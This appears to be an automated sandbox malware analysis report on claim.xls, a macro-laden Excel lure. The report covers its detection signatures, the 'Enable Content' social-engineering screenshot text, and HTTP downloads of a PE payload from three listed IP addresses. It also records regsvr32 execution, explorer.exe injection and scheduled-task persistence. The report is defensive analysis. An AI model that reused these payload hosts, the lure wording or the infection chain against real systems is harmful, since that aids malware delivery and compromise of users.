Windows Analysis Report claim.xls

Overview

General Information

Sample Name: claim.xls
Analysis ID: 491045
MD5: a120450ebe7f6455d46abd85369a002a
SHA1: 465a1f7e2aa26ce3e109c2dc559fb13e39ad8fb1
SHA256: 6bf7483d996493cef544eed71355aacc8b3566cbd05639cc377fff248881e97e
Tags: xls
Infos:

Most interesting Screenshot:

Detection

Hidden Macro 4.0
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Document exploit detected (drops PE files)
Sigma detected: Schedule system process
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Multi AV Scanner detection for dropped file
Maps a DLL or memory area into another process
Overwrites code with unconditional jumps - possibly settings hooks in foreign process
Office process drops PE file
Writes to foreign memory regions
Uses cmd line tools excessively to alter registry or file data
Sigma detected: Microsoft Office Product Spawning Windows Shell
Allocates memory in foreign processes
Injects code into the Windows Explorer (explorer.exe)
Sigma detected: Regsvr32 Command Line Without DLL
Drops PE files to the user root directory
Document exploit detected (process start blacklist hit)
Document exploit detected (UrlDownloadToFile)
Yara detected hidden Macro 4.0 in Excel
Uses schtasks.exe or at.exe to add and modify task schedules
Queries the volume information (name, serial number etc) of a device
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Document contains an embedded VBA macro which executes code when the document is opened / closed
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Found dropped PE file which has not been started or loaded
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Downloads executable code via HTTP
Abnormal high CPU Usage
Drops files with a non-matching file extension (content does not match file extension)
PE file does not import any functions
Potential document exploit detected (unknown TCP traffic)
PE file contains an invalid checksum
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Uses reg.exe to modify the Windows registry
Document contains embedded VBA macros
Drops PE files to the user directory
Potential document exploit detected (performs HTTP gets)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)

Classification

AV Detection:

barindex
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44466.2404627315[1].dat Metadefender: Detection: 28% Perma Link
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44466.2404627315[1].dat ReversingLabs: Detection: 28%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44466.2404627315[2].dat Metadefender: Detection: 28% Perma Link
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44466.2404627315[2].dat ReversingLabs: Detection: 28%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44466.2404627315[3].dat Metadefender: Detection: 28% Perma Link
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44466.2404627315[3].dat ReversingLabs: Detection: 28%
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Source: Binary string: amstream.pdb source: explorer.exe, 00000006.00000003.475215539.0000000002701000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000003.530389514.0000000002811000.00000004.00000001.sdmp
Source: Binary string: c:\chart-Green\Vowel-list\Place\935\Day.pdb source: regsvr32.exe, 00000005.00000002.475053878.000000001002A000.00000002.00020000.sdmp, explorer.exe, 00000006.00000003.476401162.0000000002701000.00000004.00000001.sdmp, regsvr32.exe, 00000009.00000002.530135383.000000001002A000.00000002.00020000.sdmp, regsvr32.exe, 0000000C.00000002.536158906.000000001002A000.00000002.00020000.sdmp
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 5_2_1000AEB4 FindFirstFileW,FindNextFileW, 5_2_1000AEB4
Source: C:\Windows\SysWOW64\explorer.exe Code function: 6_2_000DAEB4 FindFirstFileW,FindNextFileW, 6_2_000DAEB4
Source: C:\Windows\SysWOW64\explorer.exe Code function: 13_2_0008AEB4 FindFirstFileW,FindNextFileW, 13_2_0008AEB4
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_0011AEB4 FindFirstFileW,FindNextFileW, 16_2_0011AEB4
Source: C:\Windows\SysWOW64\explorer.exe Code function: 23_2_0008AEB4 FindFirstFileW,FindNextFileW, 23_2_0008AEB4

Software Vulnerabilities:

barindex
Document exploit detected (drops PE files)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: 44466.2404627315[1].dat.0.dr Jump to dropped file
Document exploit detected (process start blacklist hit)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\regsvr32.exe
Document exploit detected (UrlDownloadToFile)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Section loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileA Jump to behavior
Potential document exploit detected (unknown TCP traffic)
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 190.14.37.173:80
Potential document exploit detected (performs HTTP gets)
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 190.14.37.173:80

Networking:

barindex
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Mon, 27 Sep 2021 03:45:34 GMTContent-Type: application/octet-streamContent-Length: 495616Connection: keep-aliveX-Powered-By: PHP/5.4.16Accept-Ranges: bytesExpires: 0Cache-Control: no-cache, no-store, must-revalidateContent-Disposition: attachment; filename="44466.2404627315.dat"Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 61 1c 54 0a 25 7d 3a 59 25 7d 3a 59 25 7d 3a 59 e6 72 5a 59 26 7d 3a 59 b2 b9 44 59 24 7d 3a 59 02 bb 47 59 3e 7d 3a 59 02 bb 54 59 a5 7d 3a 59 e6 72 64 59 22 7d 3a 59 25 7d 3b 59 80 7d 3a 59 02 bb 55 59 71 7d 3a 59 02 bb 40 59 24 7d 3a 59 02 bb 46 59 24 7d 3a 59 02 bb 43 59 24 7d 3a 59 52 69 63 68 25 7d 3a 59 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 79 5f 07 45 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 08 00 00 90 02 00 00 f0 0e 00 00 00 00 00 df 31 00 00 00 10 00 00 00 a0 02 00 00 00 00 10 00 10 00 00 00 10 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 90 11 00 00 10 00 00 d4 fe 07 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e0 3f 07 00 d6 00 00 00 04 39 07 00 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 11 00 e0 0f 00 00 70 a1 02 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 2f 07 00 40 00 00 00 00 00 00 00 00 00 00 00 00 a0 02 00 2c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 35 8e 02 00 00 10 00 00 00 90 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 b6 a0 04 00 00 a0 02 00 00 b0 04 00 00 a0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 0b 0a 00 00 50 07 00 00 10 00 00 00 50 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 65 6c 6f 63 00 00 e6 24 00 00 00 60 11 00 00 30 00 00 00 60 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Mon, 27 Sep 2021 03:45:39 GMTContent-Type: application/octet-streamContent-Length: 495616Connection: keep-aliveX-Powered-By: PHP/5.4.16Accept-Ranges: bytesExpires: 0Cache-Control: no-cache, no-store, must-revalidateContent-Disposition: attachment; filename="44466.2404627315.dat"Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 61 1c 54 0a 25 7d 3a 59 25 7d 3a 59 25 7d 3a 59 e6 72 5a 59 26 7d 3a 59 b2 b9 44 59 24 7d 3a 59 02 bb 47 59 3e 7d 3a 59 02 bb 54 59 a5 7d 3a 59 e6 72 64 59 22 7d 3a 59 25 7d 3b 59 80 7d 3a 59 02 bb 55 59 71 7d 3a 59 02 bb 40 59 24 7d 3a 59 02 bb 46 59 24 7d 3a 59 02 bb 43 59 24 7d 3a 59 52 69 63 68 25 7d 3a 59 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 79 5f 07 45 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 08 00 00 90 02 00 00 f0 0e 00 00 00 00 00 df 31 00 00 00 10 00 00 00 a0 02 00 00 00 00 10 00 10 00 00 00 10 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 90 11 00 00 10 00 00 d4 fe 07 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e0 3f 07 00 d6 00 00 00 04 39 07 00 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 11 00 e0 0f 00 00 70 a1 02 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 2f 07 00 40 00 00 00 00 00 00 00 00 00 00 00 00 a0 02 00 2c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 35 8e 02 00 00 10 00 00 00 90 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 b6 a0 04 00 00 a0 02 00 00 b0 04 00 00 a0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 0b 0a 00 00 50 07 00 00 10 00 00 00 50 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 65 6c 6f 63 00 00 e6 24 00 00 00 60 11 00 00 30 00 00 00 60 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Mon, 27 Sep 2021 03:45:41 GMTContent-Type: application/octet-streamContent-Length: 495616Connection: keep-aliveX-Powered-By: PHP/5.4.16Accept-Ranges: bytesExpires: 0Cache-Control: no-cache, no-store, must-revalidateContent-Disposition: attachment; filename="44466.2404627315.dat"Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 61 1c 54 0a 25 7d 3a 59 25 7d 3a 59 25 7d 3a 59 e6 72 5a 59 26 7d 3a 59 b2 b9 44 59 24 7d 3a 59 02 bb 47 59 3e 7d 3a 59 02 bb 54 59 a5 7d 3a 59 e6 72 64 59 22 7d 3a 59 25 7d 3b 59 80 7d 3a 59 02 bb 55 59 71 7d 3a 59 02 bb 40 59 24 7d 3a 59 02 bb 46 59 24 7d 3a 59 02 bb 43 59 24 7d 3a 59 52 69 63 68 25 7d 3a 59 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 79 5f 07 45 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 08 00 00 90 02 00 00 f0 0e 00 00 00 00 00 df 31 00 00 00 10 00 00 00 a0 02 00 00 00 00 10 00 10 00 00 00 10 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 90 11 00 00 10 00 00 d4 fe 07 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e0 3f 07 00 d6 00 00 00 04 39 07 00 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 11 00 e0 0f 00 00 70 a1 02 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 2f 07 00 40 00 00 00 00 00 00 00 00 00 00 00 00 a0 02 00 2c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 35 8e 02 00 00 10 00 00 00 90 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 b6 a0 04 00 00 a0 02 00 00 b0 04 00 00 a0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 0b 0a 00 00 50 07 00 00 10 00 00 00 50 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 65 6c 6f 63 00 00 e6 24 00 00 00 60 11 00 00 30 00 00 00 60 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /44466.2404627315.dat HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 190.14.37.173Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /44466.2404627315.dat HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 111.90.148.104Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /44466.2404627315.dat HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 51.89.115.111Connection: Keep-Alive
Source: unknown TCP traffic detected without corresponding DNS query: 190.14.37.173
Source: unknown TCP traffic detected without corresponding DNS query: 190.14.37.173
Source: unknown TCP traffic detected without corresponding DNS query: 190.14.37.173
Source: unknown TCP traffic detected without corresponding DNS query: 190.14.37.173
Source: unknown TCP traffic detected without corresponding DNS query: 190.14.37.173
Source: unknown TCP traffic detected without corresponding DNS query: 190.14.37.173
Source: unknown TCP traffic detected without corresponding DNS query: 190.14.37.173
Source: unknown TCP traffic detected without corresponding DNS query: 190.14.37.173
Source: unknown TCP traffic detected without corresponding DNS query: 190.14.37.173
Source: unknown TCP traffic detected without corresponding DNS query: 190.14.37.173
Source: unknown TCP traffic detected without corresponding DNS query: 190.14.37.173
Source: unknown TCP traffic detected without corresponding DNS query: 190.14.37.173
Source: unknown TCP traffic detected without corresponding DNS query: 190.14.37.173
Source: unknown TCP traffic detected without corresponding DNS query: 190.14.37.173
Source: unknown TCP traffic detected without corresponding DNS query: 190.14.37.173
Source: unknown TCP traffic detected without corresponding DNS query: 190.14.37.173
Source: unknown TCP traffic detected without corresponding DNS query: 190.14.37.173
Source: unknown TCP traffic detected without corresponding DNS query: 190.14.37.173
Source: unknown TCP traffic detected without corresponding DNS query: 190.14.37.173
Source: unknown TCP traffic detected without corresponding DNS query: 190.14.37.173
Source: unknown TCP traffic detected without corresponding DNS query: 190.14.37.173
Source: unknown TCP traffic detected without corresponding DNS query: 190.14.37.173
Source: unknown TCP traffic detected without corresponding DNS query: 190.14.37.173
Source: unknown TCP traffic detected without corresponding DNS query: 190.14.37.173
Source: unknown TCP traffic detected without corresponding DNS query: 190.14.37.173
Source: unknown TCP traffic detected without corresponding DNS query: 190.14.37.173
Source: unknown TCP traffic detected without corresponding DNS query: 190.14.37.173
Source: unknown TCP traffic detected without corresponding DNS query: 190.14.37.173
Source: unknown TCP traffic detected without corresponding DNS query: 190.14.37.173
Source: unknown TCP traffic detected without corresponding DNS query: 190.14.37.173
Source: unknown TCP traffic detected without corresponding DNS query: 190.14.37.173
Source: unknown TCP traffic detected without corresponding DNS query: 190.14.37.173
Source: unknown TCP traffic detected without corresponding DNS query: 190.14.37.173
Source: unknown TCP traffic detected without corresponding DNS query: 190.14.37.173
Source: unknown TCP traffic detected without corresponding DNS query: 190.14.37.173
Source: unknown TCP traffic detected without corresponding DNS query: 190.14.37.173
Source: unknown TCP traffic detected without corresponding DNS query: 190.14.37.173
Source: unknown TCP traffic detected without corresponding DNS query: 190.14.37.173
Source: unknown TCP traffic detected without corresponding DNS query: 190.14.37.173
Source: unknown TCP traffic detected without corresponding DNS query: 190.14.37.173
Source: unknown TCP traffic detected without corresponding DNS query: 190.14.37.173
Source: unknown TCP traffic detected without corresponding DNS query: 190.14.37.173
Source: unknown TCP traffic detected without corresponding DNS query: 190.14.37.173
Source: unknown TCP traffic detected without corresponding DNS query: 190.14.37.173
Source: unknown TCP traffic detected without corresponding DNS query: 190.14.37.173
Source: unknown TCP traffic detected without corresponding DNS query: 190.14.37.173
Source: unknown TCP traffic detected without corresponding DNS query: 190.14.37.173
Source: unknown TCP traffic detected without corresponding DNS query: 190.14.37.173
Source: unknown TCP traffic detected without corresponding DNS query: 190.14.37.173
Source: unknown TCP traffic detected without corresponding DNS query: 190.14.37.173
Source: regsvr32.exe, 00000005.00000002.474574809.0000000002190000.00000002.00020000.sdmp, explorer.exe, 00000006.00000002.848154022.0000000002120000.00000002.00020000.sdmp, regsvr32.exe, 00000009.00000002.528621446.0000000002200000.00000002.00020000.sdmp, regsvr32.exe, 0000000C.00000002.535794158.0000000000D60000.00000002.00020000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: regsvr32.exe, 00000004.00000002.475485360.0000000001D30000.00000002.00020000.sdmp, regsvr32.exe, 00000005.00000002.474285811.00000000009C0000.00000002.00020000.sdmp, regsvr32.exe, 00000007.00000002.530747948.0000000001D80000.00000002.00020000.sdmp, regsvr32.exe, 00000009.00000002.528341049.0000000001F00000.00000002.00020000.sdmp, regsvr32.exe, 0000000B.00000002.536794194.0000000000940000.00000002.00020000.sdmp, regsvr32.exe, 0000000C.00000002.534801061.0000000000840000.00000002.00020000.sdmp String found in binary or memory: http://servername/isapibackend.dll
Source: regsvr32.exe, 00000005.00000002.474574809.0000000002190000.00000002.00020000.sdmp, explorer.exe, 00000006.00000002.848154022.0000000002120000.00000002.00020000.sdmp, regsvr32.exe, 00000009.00000002.528621446.0000000002200000.00000002.00020000.sdmp, regsvr32.exe, 0000000C.00000002.535794158.0000000000D60000.00000002.00020000.sdmp, explorer.exe, 0000000D.00000002.530873315.0000000002170000.00000002.00020000.sdmp String found in binary or memory: http://www.%s.comPA
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44466.2404627315[1].dat Jump to behavior
Source: global traffic HTTP traffic detected: GET /44466.2404627315.dat HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 190.14.37.173Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /44466.2404627315.dat HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 111.90.148.104Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /44466.2404627315.dat HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 51.89.115.111Connection: Keep-Alive

System Summary:

barindex
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Source: Screenshot number: 4 Screenshot OCR: ENABLE EDITING" button to unlock the document downloaded from the Internet. 38 n ^l: i ffmn i a ml
Source: Screenshot number: 4 Screenshot OCR: Document is Protected 18 19 20 21 VIEW COMPLETED DOCUMENT 22 23 24 25 26 27 :: THE STEPS
Source: Document image extraction number: 0 Screenshot OCR: ENABLE EDITING" button to unlock the document downloaded from the Internet. 2. Click on "ENABLE CON
Source: Document image extraction number: 0 Screenshot OCR: Document is Protected VIEW COMPLE ILD DOCUMENT THE STEPS ARE REQUIRED TO FULLY DECRYPT THE DOCUMEN
Source: Document image extraction number: 0 Screenshot OCR: ENABLE CONTENT" button to perform Microsoft Exel Decryption Core to start the decryption of the doc
Source: Document image extraction number: 1 Screenshot OCR: ENABLE EDITING" button to unlock the document downloaded from the Internet. 2. Click on "ENABLE CON
Source: Document image extraction number: 1 Screenshot OCR: Document is Protected VIEW COMPLETED DOCUMENT THE STEPS ARE REQUIRED TO FULLY DECRYPT THE DOCUMENT
Source: Document image extraction number: 1 Screenshot OCR: ENABLE CONTENT" button to perform Microsoft Exel Decryption Core to start the decryption of the doc
Office process drops PE file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44466.2404627315[1].dat Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44466.2404627315[3].dat Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\Fiosa2.der
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\Fiosa.der
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44466.2404627315[2].dat Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\Fiosa1.der
Detected potential crypto function
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 5_2_10016EB0 5_2_10016EB0
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 5_2_10012346 5_2_10012346
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 5_2_10011758 5_2_10011758
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 5_2_10014FC0 5_2_10014FC0
Source: C:\Windows\SysWOW64\explorer.exe Code function: 6_2_000E6EB0 6_2_000E6EB0
Source: C:\Windows\SysWOW64\explorer.exe Code function: 6_2_000E2346 6_2_000E2346
Source: C:\Windows\SysWOW64\explorer.exe Code function: 6_2_000E1758 6_2_000E1758
Source: C:\Windows\SysWOW64\explorer.exe Code function: 6_2_000E4FC0 6_2_000E4FC0
Source: C:\Windows\SysWOW64\explorer.exe Code function: 13_2_00096EB0 13_2_00096EB0
Source: C:\Windows\SysWOW64\explorer.exe Code function: 13_2_00092346 13_2_00092346
Source: C:\Windows\SysWOW64\explorer.exe Code function: 13_2_00091758 13_2_00091758
Source: C:\Windows\SysWOW64\explorer.exe Code function: 13_2_00094FC0 13_2_00094FC0
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_00126EB0 16_2_00126EB0
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_00121758 16_2_00121758
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_00122346 16_2_00122346
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_00124FC0 16_2_00124FC0
Source: C:\Windows\SysWOW64\explorer.exe Code function: 23_2_00096EB0 23_2_00096EB0
Source: C:\Windows\SysWOW64\explorer.exe Code function: 23_2_00092346 23_2_00092346
Source: C:\Windows\SysWOW64\explorer.exe Code function: 23_2_00091758 23_2_00091758
Source: C:\Windows\SysWOW64\explorer.exe Code function: 23_2_00094FC0 23_2_00094FC0
Document contains an embedded VBA macro which executes code when the document is opened / closed
Source: claim.xls OLE, VBA macro line: Sub auto_open()
Source: claim.xls OLE, VBA macro line: Sub auto_close()
Source: claim.xls OLE, VBA macro line: Private m_openAlreadyRan As Boolean
